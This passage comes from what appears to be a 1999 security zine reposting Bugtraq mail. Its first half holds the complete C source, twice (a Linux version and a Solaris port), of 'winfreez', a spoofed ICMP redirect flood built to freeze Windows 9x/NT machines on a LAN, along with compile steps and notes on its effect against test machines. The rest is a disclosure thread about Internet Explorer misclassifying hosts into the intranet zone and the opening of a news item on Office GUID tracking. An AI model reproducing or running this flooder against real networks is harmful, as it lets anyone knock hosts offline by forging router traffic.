where <sendtoip> is victim host, <sendfromip> is router
for victim host, <time> is time in seconds to freeze victim.
Note:
I've written small exploit for freeze win9x/nt boxes in LAN.
Proggy initiates ICMP/Redirect-host messages storm from router
(use router ip). Windows will receive redirect-host messages
and change own route table, therefore it will be frozen
or slowly working during this time.
On victim machine route table changes viewing with:
ROUTE PRINT
command in ms-dos box.
Exploit show different result for different system configuration.
System results:
p200/16ram/win95osr2 is slowly execute application
after 20 seconds of storm.
p233/96ram/nt4-sp4 is slowly working after 30
seconds of storm.
p2-266/64ram/win95 working slowly and can't normal execute
application.
Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
gcc ./winfreez.c -o winfreez
--- for Slackware Linux, Kernel 2.0.30
If you can't compile due to ip_sum not defined errors,
replace (line 207):
ip->ip_sum = 0;
to line:
ip->ip_csum = 0;
---
Soldiers Of Satan group
Russia, Moscow State University, 05 march 1999
http://sos.nanko.ru
Thanx to Mark Henderson.
*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*
* Structure of an icmp header (from sparc header).
*/
struct icmp {
u_char icmp_type; /* type of message, see below */
u_char icmp_code; /* type sub code */
u_short icmp_cksum; /* ones complement cksum of struct */
union {
u_char ih_pptr; /* ICMP_PARAMPROB */
struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
struct ih_idseq {
n_short icd_id;
n_short icd_seq;
} ih_idseq;
int ih_void;
} icmp_hun;
#define icmp_pptr icmp_hun.ih_pptr
#define icmp_gwaddr icmp_hun.ih_gwaddr
#define icmp_id icmp_hun.ih_idseq.icd_id
#define icmp_seq icmp_hun.ih_idseq.icd_seq
#define icmp_void icmp_hun.ih_void
union {
struct id_ts {
n_time its_otime;
n_time its_rtime;
n_time its_ttime;
} id_ts;
struct id_ip {
struct ip idi_ip;
/* options and then 64 bits of data */
} id_ip;
u_long id_mask;
char id_data[1];
} icmp_dun;
#define icmp_otime icmp_dun.id_ts.its_otime
#define icmp_rtime icmp_dun.id_ts.its_rtime
#define icmp_ttime icmp_dun.id_ts.its_ttime
#define icmp_ip icmp_dun.id_ip.idi_ip
#define icmp_mask icmp_dun.id_mask
#define icmp_data icmp_dun.id_data
};
u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );
void main (int argc, char **argv)
{
time_t wtime;
char *sendtoip, *sendfromip;
int s, on;
if (argc != 4)
{
fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
exit (1);
}
sendtoip = (char *)malloc(strlen(argv[1]) + 1);
strcpy(sendtoip, argv[1]);
sendfromip = (char *)malloc(strlen(argv[2]) + 1);
strcpy(sendfromip, argv[2]);
wtime = atol(argv[3]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf (stderr, "socket creation error\n" );
exit (1);
}
#ifdef IP_HDRINCL
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0)
{
fprintf (stderr, "sockopt IP_HDRINCL error\n" );
exit (1);
}
#endif
printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
printf("sendto = %s\n", sendtoip);
printf("sendfrom = %s\n", sendfromip);
printf("time = %i s\n", wtime);
attack( sendtoip, sendfromip, wtime, s );
free( (void *) sendtoip );
free( (void *) sendfromip );
}
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
time_t curtime, endtime;
int i1, i2, i3, i4;
char redir[21];
char buf[100];
struct ip *ip = (struct ip *) buf;
struct icmp *icmp = (struct icmp *) (ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
if(wtime==0) return;
if ((hp = gethostbyname (sendtoip)) == NULL)
if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
{
fprintf (stderr, "%s: unknown sendto\n", sendtoip);
exit (1);
}
if ((hp = gethostbyname (sendfromip)) == NULL)
if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
{
fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
exit (1);
}
endtime = time(NULL) + wtime;
srand((unsigned int) endtime);
do {
bzero (buf, sizeof buf);
/* sendto/gateway */
hp = gethostbyname (sendtoip);
bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);
/* sendfrom */
hp = gethostbyname (sendfromip);
bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
/* generate redirect*/
i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
bzero (redir, sizeof redir);
sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );
hp = gethostbyname (redir);
bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons (sizeof buf);
ip->ip_id = htons (4321);
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills this in */
bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst.s_addr));
icmp->icmp_ip.ip_v = 4;
icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
icmp->icmp_ip.ip_tos = 0;
icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */
icmp->icmp_ip.ip_id = htons (3722);
icmp->icmp_ip.ip_off = 0;
icmp->icmp_ip.ip_ttl = 254;
icmp->icmp_ip.ip_p = 1;
icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_REDIRECT;
icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip));
if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 )
{
fprintf (stderr, "sendto error\n");
exit (1);
}
}while (time(NULL)!=endtime);
}
/*
* in_cksum -- Checksum routine for Internet Protocol family headers (C
* Version) - code from 4.4 BSD
*/
u_short in_cksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
-=- And a Solaris version:
Date: Tue, 9 Mar 1999 22:34:32 -0500
From: Max Schubert <mschube@jgvandyke.com>
To: BUGTRAQ@netspace.org
Subject: Winfreeze.c for Solaris ...
Hi,
Script kiddie number 25006 here :) ... apologize if this is too
trivial to be worth your time ....
This is just a port of the Winfreeze.c ICMP redirect exploit for Solaris
(posted earlier today) ... tested using Solaris 2.5.1 ...
max
-------
/*
WinFreez.c by Delmore <delmore@moscowmail.com>
ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
in LAN.
Usage: winfreez sendtoip sendfromip time
where <sendtoip> is victim host, <sendfromip> is router
for victim host, <time> is time in seconds to freeze victim.
Note:
I've written small exploit for freeze win9x/nt boxes in LAN.
Proggy initiates ICMP/Redirect-host messages storm from router
(use router ip). Windows will receive redirect-host messages
and change own route table, therefore it will be frozen
or slowly working during this time.
On victim machine route table changes viewing with:
ROUTE PRINT
command in ms-dos box.
Exploit show different result for different system configuration.
System results:
p200/16ram/win95osr2 is slowly execute application
after 20 seconds of storm.
p233/96ram/nt4-sp4 is slowly working after 30
seconds of storm.
p2-266/64ram/win95 working slowly and can't normal execute
application.
Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
gcc ./winfreez.c -o winfreez
--- for Slackware Linux, Kernel 2.0.30
If you can't compile due to ip_sum not defined errors,
replace (line 207):
ip->ip_sum = 0;
to line:
ip->ip_csum = 0;
---
Soldiers Of Satan group
Russia, Moscow State University, 05 march 1999
http://sos.nanko.ru
Thanx to Mark Henderson.
*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <errno.h>
/*
* Structure of an icmp header (from sparc header).
*/
u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );
void main (int argc, char **argv)
{
time_t wtime;
/* setsockopt on Solaris 2.5.1 wants (char *) for 4th arg */
char *sendtoip, *sendfromip, *on;
int s;
if (argc != 4)
{
fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
exit (1);
}
sendtoip = (char *)malloc(strlen(argv[1]) + 1);
strcpy(sendtoip, argv[1]);
sendfromip = (char *)malloc(strlen(argv[2]) + 1);
strcpy(sendfromip, argv[2]);
wtime = atol(argv[3]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf (stderr, "socket creation error: %s\n", strerror(errno));
exit (1);
}
#ifdef IP_HDRINCL
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof (on)) < 0)
{
fprintf (stderr, "sockopt IP_HDRINCL error\n" );
exit (1);
}
#endif
printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
printf("sendto = %s\n", sendtoip);
printf("sendfrom = %s\n", sendfromip);
printf("time = %i s\n", wtime);
attack( sendtoip, sendfromip, wtime, s );
free( (void *) sendtoip );
free( (void *) sendfromip );
}
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
time_t curtime, endtime;
int i1, i2, i3, i4;
char redir[21];
char buf[100];
struct ip *ip = (struct ip *) buf;
struct icmp *icmp = (struct icmp *) (ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
if(wtime==0) return;
if ((hp = gethostbyname (sendtoip)) == NULL)
if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
{
fprintf (stderr, "%s: unknown sendto\n", sendtoip);
exit (1);
}
if ((hp = gethostbyname (sendfromip)) == NULL)
if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
{
fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
exit (1);
}
endtime = time(NULL) + wtime;
srand((unsigned int) endtime);
do {
bzero (buf, sizeof buf);
/* sendto/gateway */
hp = gethostbyname (sendtoip);
bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);
/* sendfrom */
hp = gethostbyname (sendfromip);
bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
/* generate redirect*/
i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
bzero (redir, sizeof redir);
sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );
hp = gethostbyname (redir);
bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons (sizeof buf);
ip->ip_id = htons (4321);
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills this in */
bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof
(ip->ip_dst.s_addr));
icmp->icmp_ip.ip_v = 4;
icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
icmp->icmp_ip.ip_tos = 0;
icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */
icmp->icmp_ip.ip_id = htons (3722);
icmp->icmp_ip.ip_off = 0;
icmp->icmp_ip.ip_ttl = 254;
icmp->icmp_ip.ip_p = 1;
icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_REDIRECT;
icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof
(*ip));
if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) <
0 )
{
fprintf (stderr, "sendto error\n");
exit (1);
}
}while (time(NULL)!=endtime);
}
/*
* in_cksum -- Checksum routine for Internet Protocol family headers (C
* Version) - code from 4.4 BSD
*/
u_short in_cksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
@HWA
04.5 Unknown Zone:
Windows doesn't properly distinguish between intra and internet zones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 5 Mar 1999 21:53:18 -0500
From: Jim Paris <jim@JTAN.COM>
To: BUGTRAQ@netspace.org
Subject: More Internet Explorer zone confusion
Even after the patch described in Microsoft Security Bulletin MS98-016
(http://www.microsoft.com/security/bulletins/ms98-016.asp), IE4 still
has big problems with distinguishing between sites that belong in the
"Internet Zone" and sites that belong in the "Local Intranet Zone".
MS98-016 dealt with addresses such as http://031713501415/, which
resolve to Internet hosts but are categorized as being in the "Local
Intranet Zone".
I've found two cases where the problem still exists. The first is when
the user has the "Domain Suffix Search Order" in the TCP/IP DNS settings
set to include domains such as "com". In that case, the address
http://microsoft/
will retrieve the page at
http://microsoft.com/
but it will be considered to be in the "Local Intranet Zone".
The second case occurs when a host has an assigned alias in the hosts
table (C:\WINDOWS\HOSTS). A host table entry such as:
207.46.131.13 hello
will cause the URL
http://hello/
to retrieve the page at http://207.45.131.13/, but (yep, you guess it)
Internet Explorer still considers it to be in the "Local Intranet Zone".
This has security implications, since settings for the Local Intranet
Zone may be (and, by default, ARE) less secure than those for the
Internet Zone.
And the funny part? Microsoft's response when I told them this:
--8<---cut here-----------------------------------------
Hi Jim -
Had a talk with one of the IE developers, and this behavior is correct.
Here's why: it's impossible to tell from an IP address whether it's internal
or external. 100.100.100.100, or any other address, could be either
internal or external, depending on whether you're behind a firewall or not.
That means that IE has to rely on the URL. By convention, an URL that does
not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an
internal site. I'm told that this is how all web browsers make the
distinction. You have to make specific reconfigurations to allow the
dotless URLs to resolve externally. Thanks,
Secure@Microsoft.Com
--8<---cut here-----------------------------------------
"This behavior is correct"?!?!?! Give me a break. They obviously
didn't think so when they released the MS98-016 bulletin.
Jim Paris
jim@jtan.com
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 03:56:27 -0500
From: Jeremy Nimmer <bugtraq.user@parity.mit.edu>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
>MS98-016 dealt with addresses such as http://031713501415/
>...
>user has the "Domain Suffix Search Order" in the TCP/IP DNS settings
>...
>The second case occurs when a host has an assigned alias in the hosts
>...
>"This behavior is correct"?!?!?! Give me a break. They obviously
>didn't think so when they released the MS98-016 bulletin.
>
>Jim Paris
>jim@jtan.com
The difference between MS98-016 and your examples is simple. The bulletin
addressed an issue where an external site could, without your control, fool
your browser into thinking a remote site was "local intranet". In your
examples, the user must choose specific settings to allow the problem to
occur. If you are concerned about the problem, simply remove .com, etc.
>from your DNS suffix search, and don't put nasty hosts in your hosts file.
The zone settings are not meant to be rock-solid security protection. If
they pose a risk to you, set all zones to the maximum security. This was
all already talked about when the above-mentioned bulletin came out.
In the end, this is not a "bug" in the browser - it's a configuration
problem. While worthy of mention, it does not deserve flamage.
Thanks,
-= remmiN ymereJ | Jeremy Nimmer =-
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 23:37:28 +1300
From: Oliver Lineham <oliver@LINEHAM.CO.NZ>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
At 21:53 5/03/99 -0500, you wrote:
Yech.
>That means that IE has to rely on the URL. By convention, an URL that does
>not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an
>internal site. I'm told that this is how all web browsers make the
>distinction. You have to make specific reconfigurations to allow the
>dotless URLs to resolve externally. Thanks,
This is insane - and most probably not how it distinguishes domains at all.
Such a system implies that the "dot-something"s are hard-coded into the
browser! This would be a similar flaw to the original cookie
specification's one about domains that I announced last year. Consider:
- Country domains. They're not dot-somethings, but under this regime
anything from somewhere like New Zealand (.nz) would be a "Local Intranet
Site".
- New TLDs. Internic goes and adds a .web or .store or something that
didn't exist when the browser was released. I'm sure all the e-commerce
sites on .store would love their servers being considered "Local Intranet
Sites"!
If this is how the zones are implemented, then its insane. If not, then
IE's claim of being able to distinguish intranet sites from internet ones
is an outright lie and the "feature" should be removed.
Oliver
---------------------------------------------------
Internet Services / Webdesign / Strategic Planning
PO Box 30-481, Lower Hutt, NZ oliver@lineham.co.nz
Phone +64 4 566-0627 Facsimile +64 4 570-1900
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 09:06:23 +0000
From: David E. Smith <dave@TECHNOPAGAN.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
On Fri, 5 Mar 1999, Jim Paris wrote about the Local Intranet Zone.
All the comments made are, technically, correct, but Microsoft could have
at least tried. None of these are foolproof, but they're a start.
* Be paranoid about entries in the hosts file. Arguably, hosts files are
obsolete, thanks to DNS. (No, I won't make the argument.)
* Warning dialog boxes for the above, and maybe for anything where the TLD
is guessed at. (The http://microsoft/ example. Just warn the user that the
requested site was guessed, give some sane options like `Go there, treat
it as Internet', `Go there, treat it as local', `Don't go there', and so
on.)
* Anything that doesn't resolve to a designated local zone (10.*.*.*, and
the other reserved addresses) gets the same warning.
Or, just change the default behaviour on all those to treat the site as
Internet rather than intranet. Probably easier that way, though a bit more
troublesome for the user, especially when we guess wrong.
Care to take bets on whether anything even remotely like this is ever
done?
...dave
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 00:18:10 -0800
From: Walt Armour <walt@BLARG.NET>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
I would agree that these are still issues but there is a difference
between them and the original problem.
With the original problem any site could redirect you to a site and make
it look like Local Intranet simply by using the 'http://031713501415/'
format.
With these two new issues someone must have direct knowledge about your
machine's configuration or have direct access to your machine in order to
make a not-quite-too-common configuration change. If either of these
situations occurs then the safety level of my browser will quickly become
the least of my worries. :)
IMO Microsoft is right in saying that the problems are (marginally)
different. Whether or not their method for determining "local intranet"
is right is a completely different subject.
walt
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 11:07:19 -0600
From: iversen <signal11@MEDIAONE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
Oliver Lineham wrote:
> - New TLDs. Internic goes and adds a .web or .store or something that
> didn't exist when the browser was released. I'm sure all the e-commerce
> sites on .store would love their servers being considered "Local Intranet
> Sites"!
>
> If this is how the zones are implemented, then its insane. If not, then
> IE's claim of being able to distinguish intranet sites from internet ones
> is an outright lie and the "feature" should be removed.
This seems to be trivial to resolve - put everything in the internet zone
unless it matches a list containing the local intranets. Then do
reverse-dns
of everything that's allegedly inside the intranet and make sure everything
matches up. It isn't a perfect solution, but it would make it substantially
harder to fake a remote site as local. You also get the added benefit of
not needing to worry about how IE resolves domains/ip addresses.
--
signal11@mediaone.net | BOFH, Malign networks
I'll give you the TCO of Linux as soon as my
calculator stops saying "divide by zero error."
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 14:17:43 -0500
From: Jim Paris <jim@JTAN.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
> The difference between MS98-016 and your examples is simple. The bulletin
> addressed an issue where an external site could, without your control, fool
> your browser into thinking a remote site was "local intranet".
And this can occur with my examples as well. I didn't control it at
all.
> In your
> examples, the user must choose specific settings to allow the problem to
> occur. If you are concerned about the problem, simply remove .com, etc.
> from your DNS suffix search, and don't put nasty hosts in your hosts file.
Just because I added a DNS suffix search order and put hosts into my
hosts file does not (or, at least, SHOULD not) mean that I am choosing
"specific settings to allow the problem to occur". How was I supposed
to know that simplifying my life by adding a search suffix of ".com" was
opening me up to a vulnerability?
> In the end, this is not a "bug" in the browser - it's a configuration
> problem. While worthy of mention, it does not deserve flamage.
No, this is a bug in the browser. Changing something over at point A
shouldn't affect my security at point B.
-jim
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 11:58:55 -0800
From: Paul Leach <paulle@MICROSOFT.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
> -----Original Message-----
> From: Oliver Lineham [mailto:oliver@LINEHAM.CO.NZ]
> Sent: Monday, March 08, 1999 2:37 AM
> To: BUGTRAQ@NETSPACE.ORG
> Subject: Re: More Internet Explorer zone confusion
>
>
> At 21:53 5/03/99 -0500, you wrote:
>
> Yech.
>
> >That means that IE has to rely on the URL. By convention,
> an URL that does
> >not end with a "dot-something" (.com, .edu, .gov, etc) is
> assumed to be an
> >internal site. I'm told that this is how all web browsers make the
> >distinction. You have to make specific reconfigurations to allow the
> >dotless URLs to resolve externally. Thanks,
>
> This is insane - and most probably not how it distinguishes
> domains at all.
That's correct.
I believe that the rule for Intranet zone is simple -- if the name has no
"." and is less than 15 characters long, then it's Intranet zone. This
algorithm works with the default configuration of Windows. If you configure
your machine so that the above assumption is violated, then you'll get a
mis-classification.
When designing better ways of doing this, keep in mind that the primary tool
that the browser has to work with is "gethostbyname" -- which, IMO, doesn't
return enough information about how the name was resolved to be helpful for
security purposes (even though it garnered some in the process of
resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was
used to resolve the name, or which DNS search suffix was used.
Paul
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 19:49:32 -0600
From: Jeremie <jer@JEREMIE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion (new issue)
> The assumptions may indeed be flawed, but I don't understand how your
> observations below demonstrate that.
The assumption:
[if the name has no "." and is less than 15 characters long, then it's
Intranet zone]
Simply:
The name "ls" has no "." and is less than 15 characters, and yet it is a
valid *Internet* host and should *not* be qualified as "Intranet Zone".
Jeremie
jer@jeremie.com
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 01:59:08 -0500
From: Christopher Masto <chris@NETMONGER.NET>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
Is this intranet zone thing _really_ of any value? Why is there a
built-in default assumption that something from a "local" server is
more trustworthy? Consider the following situations:
1. A customer of your ISP, netmonger.net, is evil. They have a page
that links or redirects to http://www/~evil/evil.html, taking
advantage of the fact that your machine is configured with your
ISP's domain in the search list.
2. You go to school at RPI. You have a dorm ethernet connection.
Your machine is naive.dorm.rpi.edu, and you have dorm.rpi.edu
in your domain search list. An evil person gets evil.dorm.rpi.edu,
and you know the rest.
3. You work at G
iganticorp and have access to high-level trade secrets.
Giganticorp has an intranet where employees can put up their own
web pages. An evil employee takes advantage of the default security
settings to gain access to your secrets, which he sells to the
competition.
Numbers 1 and 2 ask the question, "Why are we assuming that a
non-qualified host name implies intranet implies trust?" Number 3
asks the question, "Why are we assuming that intranet implies trust?"
Another question is "How many people who use IE have no intranet?"
Considering that there are a quantity of tools available to deploy
IE at your company with preconfigured settings, why not default to
not having this intranet zone. If Giganticorp needs to turn down
the security, they can do so at the same time they're customizing
the rest of the settings.
I don't personally use Microsoft products, and I am not quite familiar
with the specific security precautions that are disabled for the
intranet zone, but if they're enough to cause concern on the Internet,
the same problems can occur even when the browser isn't malfunctioning
at all.
--
Christopher Masto Director of Operations NetMonger Communications
chris@netmonger.net info@netmonger.net http://www.netmonger.net
Free yourself, free your machine, free the daemon -- http://www.freebsd.org/
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 08:58:43 +0100
From: Tilman Schmidt <Tilman.Schmidt@SEMA.DE>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
At 11:07 08.03.99 -0600, iversen wrote:
>Oliver Lineham wrote:
>> If this is how the zones are implemented, then its insane. If not, then
>> IE's claim of being able to distinguish intranet sites from internet ones
>> is an outright lie and the "feature" should be removed.
>
>This seems to be trivial to resolve - put everything in the internet zone
>unless it matches a list containing the local intranets. Then do
>reverse-dns
>of everything that's allegedly inside the intranet and make sure everything
>matches up.
This is of course the correct way to implement an "intranet zone".
It has, however, one serious drawback: you have to configure it.
Consumer product manufacturers like Microsoft want their product
to work as much "out of the box" as possible.
However, IMHO there is no way to implement the concept of "intranet
zone" reliably without actually telling the browser the exact extent
of your intranet one way or other. Heuristics like "if there is no
dot in the hostname then let's assume it is in the intranet" just
aren't reliable enough to base a security mechanism on.
At Mon, 8 Mar 1999 11:58:55 -0800, Paul Leach wrote:
>I believe that the rule for Intranet zone is simple -- if the name has no
>"." and is less than 15 characters long, then it's Intranet zone. This
>algorithm works with the default configuration of Windows. If you configure
>your machine so that the above assumption is violated, then you'll get a
>mis-classification.
It doesn't even work with the default configuration of Windows,
because the basic assumption that every host with an FQDN in the
same DNS domain as the client is also in the intranet zone is
flawed. There are perfectly legitimate configurations where this
is not the case.
>When designing better ways of doing this, keep in mind that the primary tool
>that the browser has to work with is "gethostbyname" -- which, IMO, doesn't
>return enough information about how the name was resolved to be helpful for
>security purposes (even though it garnered some in the process of
>resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was
>used to resolve the name, or which DNS search suffix was used.
It is irrelevant how the name was resolved. You need a mechanism
to specify the intended scope of your intranet unambiguously,
instead of relying on some unspoken assumption like "for our
purposes, 'intranet zone' will be taken to mean all hosts which
happen to have at least one FQDN in the same domain as the
client".
--
Tilman Schmidt E-Mail: Tilman.Schmidt@sema.de (office)
Sema Group Koeln, Germany tilman@schmidt.bn.uunet.de (private)
"newfs leaves the filesystem in a well known state (empty)."
- Henrik Nordstrom
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 17:15:07 -0500
From: Jim Frost <jimf@FROSTBYTES.COM>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
|This is of course the correct way to implement an "intranet zone".
|It has, however, one serious drawback: you have to configure it.
|Consumer product manufacturers like Microsoft want their product
|to work as much "out of the box" as possible.
Since there is no intranet for most consumers this seems like largely a
non-issue. Those with intranets in their home probably know enough to
configure it properly. And businesses should have IT departments whose job it
is to manage it.
So what's the problem?
|It doesn't even work with the default configuration of Windows,
|because the basic assumption that every host with an FQDN in the
|same DNS domain as the client is also in the intranet zone is
|flawed. There are perfectly legitimate configurations where this
|is not the case.
Not only legitimate, but increasingly common. Cable modem customers, for
instance, tend to have their entire region in the same "intranet": eg
customer.ne.mediaone.net. I assure you that you don't want to treat the entire
northeast region of MediaOne customers as trusted in any way, shape, or form.
jim
@HWA
04.6 Sniffing out MS Security Glitch the GUID (and how to defeat it?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"If Microsoft starts compelling people to
register, then its going to take a lot of
time for people to disentangle their lives
from Microsoft's sticky tentacles."
From Wired/ZDNET
http://www.wired.com/news/news/technology/story/18331.html
Sniffing Out MS Security Glitch
by Chris Oakes
5:30 p.m. 8.Mar.99.PST
A security vulnerability that hides unique identifiers in Microsoft
Office documents may affect files created by other software
applications, according to the programmer who identified the breach.
Other Office documents and browser cookies, and possibly even software
from other companies, can store the unique identity codes, according to
Richard Smith, president of Phar Lap Software in Cambridge, Massachusetts,
who first reported the security glitch on Sunday.
Smith discovered that Excel and Word applications fingerprint files with
an identifying number. That number is used by the hardware that connects
a PC to a local area network. The 32-digit numbers were designed long
ago by developers of networking hardware to identify individual machines.
"These things are slippery. These [numbers] are floating around -- it's
hard to say where they're showing up," said Smith. Microsoft was not
available for comment. The identifying number is trapped in the Windows
registry file as a Globally Unique Identifier, or GUID, and embedded in a
hidden part of documents created using Office, including Word, Excel, and
PowerPoint.
"I got email for someone mentioning that GUIDs are also put in Web-browser
cookies. I did a quick scan on my Netscape cookies file and found a number
of Web sites that were indeed using GUIDs for identification purposes,"
